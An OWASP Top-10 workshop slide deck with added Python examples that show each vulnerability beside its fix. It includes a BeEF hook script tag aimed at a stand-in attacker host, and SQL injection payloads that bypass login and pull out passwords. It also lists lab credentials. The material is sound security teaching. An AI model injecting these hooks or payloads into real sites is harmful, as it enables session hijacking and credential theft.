«OWASP Top 10 hands on workshop» by Stanislav Breslavskyi

Posted on 16-Aug-2015


OWASP Top-10 Hands-on Workshop

whoami

• Security Engineer @ SoftServe
• NU “LP” student

What do we do?

• Web Application Security Assessment
• Penetration Testing
• Secure Software Development Lifecycle

Open Web Application Security Project

• Non-profit organization
• Numerous chapters around the globe
• Everyone can join
• Open-Source

Meetings and conferences all around the globe

@AppSecEU ‘15 in Amsterdam

Knowledge base

OWASP Top-10 (2013 edition)

• A1 Injection
• A2 Broken Authentication and Session Management
• A3 Cross-Site Scripting (XSS)
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards

OWASP is GOOD!

Hackers
• Methodologies for how to hack

Developers
• Methodologies for how to implement things securely and how to fix them

Testers
• The same as hackers
• Methodologies for how to test the security of their own projects

Demo Time

Rules

• Either follow the scenario with me or try to find the 10 vulnerabilities by yourself.
• No scanners (a room full of them is a DDoS on the lab).
• Do not attack the infrastructure. Only web application vulnerabilities here.
• Do not attack the people around you.
• No punching.

Let’s begin

• 172.16.216.28:5000/login?redirect_url=google.com
• 172.16.216.28:5000/change_password=1234
• Credentials:
  terror0-9@gmail.com / password
  terror-admin0-9@gmail.com / admin

Open Redirect

example.com/smth?redirect_url=http://google.com
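The fix for the redirect above is to validate the target before emitting the Location header. The following is an added example, not code from the slides or from the hole-blog project: it keeps only site-relative paths and absolute URLs whose hostname is exactly the lab host 172.16.216.28 (taken from the "Let's begin" slide), and sends everything else to a fallback page. The function names are assumptions made for this example.

```python
# Added example (not from the workshop slides or hole-blog): validating a
# redirect_url parameter so it can only send the browser back into our site.
from urllib.parse import urlparse


def safe_redirect_target(redirect_url, allowed_host="172.16.216.28", fallback="/"):
    """Return redirect_url if it stays on allowed_host, otherwise fallback.

    Accepted: a site-relative path ("/profile") or an absolute http(s) URL
    whose hostname is exactly allowed_host. Rejected: other hosts, bare
    hostnames ("google.com"), protocol-relative "//evil", javascript: URLs,
    userinfo tricks ("http://allowed@evil") and backslash variants.
    """
    if not redirect_url:
        return fallback
    # Browsers treat "\" like "/" in URLs, urlparse does not: reject early.
    if "\\" in redirect_url:
        return fallback
    parts = urlparse(redirect_url)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target. "//evil" never lands here because urlparse puts
        # "evil" into netloc; "google.com" is a bare path and is refused.
        if parts.path.startswith("/") and not parts.path.startswith("//"):
            return redirect_url
        return fallback
    # parts.hostname is lower-cased, port-stripped and ignores userinfo,
    # so "http://172.16.216.28@google.com/" compares as "google.com".
    if parts.scheme in ("http", "https") and parts.hostname == allowed_host:
        return redirect_url
    return fallback


def vulnerable_location(redirect_url):
    """What the slide's login?redirect_url= does: trust the parameter as-is."""
    return "Location: " + redirect_url


def hardened_location(redirect_url):
    """Same header, but only after the target passed safe_redirect_target."""
    return "Location: " + safe_redirect_target(redirect_url)


if __name__ == "__main__":
    for target in ("/dashboard", "http://google.com", "//google.com/",
                   "javascript:alert(1)", "http://172.16.216.28@google.com/"):
        print("%-38s -> %s" % (target, hardened_location(target)))
```

An allow-list of exact hostnames is deliberately used instead of `startswith`/`endswith` checks, which would let `172.16.216.28.evil.example` or `http://172.16.216.28@evil.example` through.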

CSRF

bank.com/trans?acc1=1234&acc2=4321&amount=10000

Open Redirect + CSRF
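The transfer URL on the CSRF slide is forgeable because it changes state over GET and carries nothing that an attacker's page cannot reproduce; the open redirect from the previous slide is just one more way to deliver it to a logged-in victim. The following added example (not code from the slides or hole-blog) shows the two checks that break the chain: refuse state changes over GET, and require a per-session CSRF token that is an HMAC of the session id under an application secret. The request is modelled as a plain dict, and SECRET_KEY and all function names are assumptions made for this example.

```python
# Added example (not from the workshop slides or hole-blog): CSRF protection
# for a funds-transfer endpoint, plus a model of the forged GET request a
# victim's browser sends when lured (by link, <img>, or open redirect).
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

SECRET_KEY = secrets.token_bytes(32)  # assumption: would come from app config


def csrf_token(session_id):
    """Token for a session: HMAC-SHA256(secret, session id), hex encoded."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, token):
    """Constant-time comparison so the check itself leaks nothing."""
    if not token:
        return False
    return hmac.compare_digest(csrf_token(session_id), token)


def handle_transfer(request):
    """Return (accepted, reason). request = {"method", "cookies", "form"}."""
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return False, "not logged in"
    if request["method"] != "POST":
        # Any site the victim visits can make the browser send a GET with
        # the victim's cookies attached; never change state on GET.
        return False, "state change over GET refused"
    form = request.get("form", {})
    if not verify_csrf(session_id, form.get("csrf_token")):
        # An attacker's page cannot read the victim's token, so it cannot
        # produce a POST that passes this check.
        return False, "missing or invalid CSRF token"
    for field in ("acc1", "acc2", "amount"):
        if field not in form:
            return False, "missing field " + field
    return True, "transfer %s -> %s: %s" % (form["acc1"], form["acc2"], form["amount"])


def forged_get_request(victim_session_id, url):
    """Model what the victim's browser sends when sent to url: the victim's
    session cookie goes along automatically, the query string is the
    attacker's, and there is no CSRF token."""
    query = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
    return {"method": "GET", "cookies": {"session": victim_session_id}, "form": query}


if __name__ == "__main__":
    victim = "sess-victim"
    lure = "http://bank.com/trans?acc1=1234&acc2=4321&amount=10000"
    print(handle_transfer(forged_get_request(victim, lure)))
    good = {"method": "POST", "cookies": {"session": victim},
            "form": {"acc1": "1234", "acc2": "4321", "amount": "10000",
                     "csrf_token": csrf_token(victim)}}
    print(handle_transfer(good))
```

Deriving the token from the session id with an HMAC means nothing extra has to be stored server-side; a token stolen from another session (or forged without the secret) fails the comparison.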

Cross-Site Scripting

Supply JavaScript code instead of valid data; the browser then executes it as part of the page.

Broken Auth

Session management flaws (in our case the HttpOnly flag is missing on the session cookie, so script injected into the page can read it)

XSS + Broken Authentication

Inject this script into the website:

<script src="<url to the hook>" type="text/javascript"></script>

BeEF
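The chain on this slide needs two defects: a page that reflects user input unescaped (so the hook tag becomes live markup) and a session cookie that script is allowed to read. The following added example (not code from the slides or hole-blog) shows each sink beside its fixed form, using only the standard library. The hook URL is a constructed placeholder standing in for "<url to the hook>", and the function names are assumptions made for this example.

```python
# Added example (not from the workshop slides or hole-blog): the stored-XSS
# sink and its escaped version, and the session cookie with and without the
# HttpOnly flag.
import html
from http.cookies import SimpleCookie

# Constructed payload in the shape of the slide's BeEF hook tag; the URL is
# a placeholder, not a real hook server.
HOOK_PAYLOAD = '<script src="http://attacker.example/hook.js" type="text/javascript"></script>'


def render_comment_vulnerable(text):
    """Reflect user input straight into the page: the browser loads the hook."""
    return "<p>%s</p>" % text


def render_comment(text):
    """Escape for an HTML text context: <, >, & and both quote characters
    become entities, so the payload is displayed instead of executed."""
    return "<p>%s</p>" % html.escape(text, quote=True)


def session_cookie_vulnerable(session_id):
    """Set-Cookie value with no flags: document.cookie exposes it to any
    script running in the page, so a hooked browser can hand it to BeEF."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    return cookie.output(header="").strip()


def session_cookie(session_id):
    """Set-Cookie value with HttpOnly (hidden from script), Secure (sent over
    HTTPS only) and SameSite=Lax (not sent on cross-site POSTs)."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


def is_script_neutralised(rendered):
    """True when no raw <script tag survived in the rendered HTML."""
    return "<script" not in rendered.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(HOOK_PAYLOAD))
    print(render_comment(HOOK_PAYLOAD))
    print("Set-Cookie:", session_cookie_vulnerable("abc123"))
    print("Set-Cookie:", session_cookie("abc123"))
```

HttpOnly stops the hooked page from reading the cookie, but the injected script still runs with the victim's session on the same origin, so the flag limits the damage rather than replacing output encoding.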

SQL-injection

Supply SQL operators and statements instead of valid data; the server concatenates them into its query and executes them as SQL rather than treating them as string values.

Security misconfiguration

Crypto misuse, wrong DB configuration, etc.

Sensitive Data Exposure

Critical info leakage

SQLi + Security Misconfiguration + Sensitive Data Exposure
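The following added example (not code from the slides or hole-blog) walks through this chain against an in-memory SQLite table: a login query built by string formatting is bypassed with a comment and with a tautology, and a UNION payload then reads the password column, which is only so damaging because the passwords sit in clear text (the "crypto misuse / wrong DB configuration" of the misconfiguration slide). Beside it are the parameterised query and salted PBKDF2 storage that close both holes. The users table is constructed from the two credentials on the "Let's begin" slide, and the function names are assumptions made for this example.

```python
# Added example (not from the workshop slides or hole-blog): SQL injection
# in a login query, the data it exposes, and the parameterised/hashed fix.
import hashlib
import hmac
import os
import sqlite3


def make_db():
    """Constructed users table; clear-text passwords are the misconfiguration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (email, password, role) VALUES (?, ?, ?)",
        [("terror0-9@gmail.com", "password", "user"),
         ("terror-admin0-9@gmail.com", "admin", "admin")],
    )
    return conn


def login_vulnerable(conn, email, password):
    """User input is spliced into the SQL text, so quotes, OR, -- and UNION
    are interpreted as SQL. Returns the (email, role) rows that matched."""
    query = ("SELECT email, role FROM users WHERE email = '%s' AND password = '%s'"
             % (email, password))
    return conn.execute(query).fetchall()


def login_safe(conn, email, password):
    """Parameters travel separately from the SQL text; the driver never
    lets them change the structure of the query."""
    return conn.execute(
        "SELECT email, role FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchall()


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256; store this string instead of the password.
    Format: iterations$salt_hex$digest_hex so verification can recompute it."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(stored, candidate):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    iterations, salt_hex, _digest_hex = stored.split("$")
    recomputed = hash_password(candidate, bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(recomputed, stored)


if __name__ == "__main__":
    conn = make_db()
    # Comment out the password check and log in as admin.
    print(login_vulnerable(conn, "terror-admin0-9@gmail.com' --", "anything"))
    # Pull the password column back through the role column.
    print(login_vulnerable(conn, "' UNION SELECT email, password FROM users --", "x"))
    # Same payloads against the parameterised query.
    print(login_safe(conn, "terror-admin0-9@gmail.com' --", "anything"))
    print(verify_password(hash_password("password"), "password"))
```

With hashed storage the UNION payload would still return the column, but an attacker would get salted PBKDF2 strings to crack offline instead of working credentials; the parameterised query is what stops the column from being reachable in the first place.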

Insecure Direct Object Reference

Access a file you have no permission to (e.g. by changing the object identifier in the request)

Missing Function Level Control

Access to a restricted (sensitive) function.
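The two previous slides are the two levels at which authorization is usually forgotten: per object (does this record belong to the caller?) and per function (may this caller invoke this handler at all?). The following added example (not code from the slides or hole-blog) shows an unchecked lookup beside an ownership check, and an unprotected privileged handler beside one guarded by a role decorator. The users, the file store and all function names are constructed for this example; the privileged function is called change_password only to echo the URL on the "Let's begin" slide, not because the lab application works this way.

```python
# Added example (not from the workshop slides or hole-blog): object-level
# (IDOR) and function-level access checks.
import functools

# Constructed accounts, reusing the two roles from the "Let's begin" slide.
USERS = {
    "terror0-9@gmail.com": {"role": "user"},
    "terror-admin0-9@gmail.com": {"role": "admin"},
}

# Constructed file store keyed by the id that would appear in the URL.
FILES = {
    1: {"owner": "terror0-9@gmail.com", "name": "notes.txt"},
    2: {"owner": "terror-admin0-9@gmail.com", "name": "salaries.xlsx"},
}


def get_file_vulnerable(user, file_id):
    """IDOR: the id from the request is looked up directly, no ownership check,
    so any logged-in user reads any file by changing the number."""
    return FILES[file_id]


def get_file(user, file_id):
    """Object-level check: the record must belong to the caller (admins excepted)."""
    record = FILES.get(file_id)
    if record is None:
        return None
    if record["owner"] != user and USERS.get(user, {}).get("role") != "admin":
        raise PermissionError("user %s may not read file %d" % (user, file_id))
    return record


def require_role(role):
    """Function-level check: privileged handlers declare the role they need,
    and the check runs before the handler body regardless of the URL used."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(user, *args, **kwargs):
            if USERS.get(user, {}).get("role") != role:
                raise PermissionError("%s requires role %s" % (func.__name__, role))
            return func(user, *args, **kwargs)
        return wrapper
    return decorator


def change_password_vulnerable(user, target, new_password):
    """Reachable by anyone who finds the URL; nothing checks who is calling."""
    return "password of %s changed" % target


@require_role("admin")
def change_password(user, target, new_password):
    """Same handler, now only callable with the admin role."""
    return "password of %s changed" % target


def attempt(func, *args):
    """Run func and report ('ok', result) or ('denied', message)."""
    try:
        return "ok", func(*args)
    except PermissionError as exc:
        return "denied", str(exc)


if __name__ == "__main__":
    print(attempt(get_file, "terror0-9@gmail.com", 2))
    print(attempt(change_password, "terror0-9@gmail.com", "terror-admin0-9@gmail.com", "x"))
    print(attempt(change_password, "terror-admin0-9@gmail.com", "terror0-9@gmail.com", "x"))
```

Hiding the admin link in the menu is not a function-level control; the decorator is, because it runs no matter how the handler was reached.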

Using Components with known Vulnerabilities

Vulnerable OS, libraries, frameworks, CMS, algorithms, etc.

Everything else …

What to do next?

• Try it by yourself: https://github.com/Varyagovich/hole-blog
• Try to fix the project
• Use OWASP projects (attack/prevention cheat sheets and tools)
• Contribute!

http://owasp-lviv.blogspot.com/

STAY SAFE!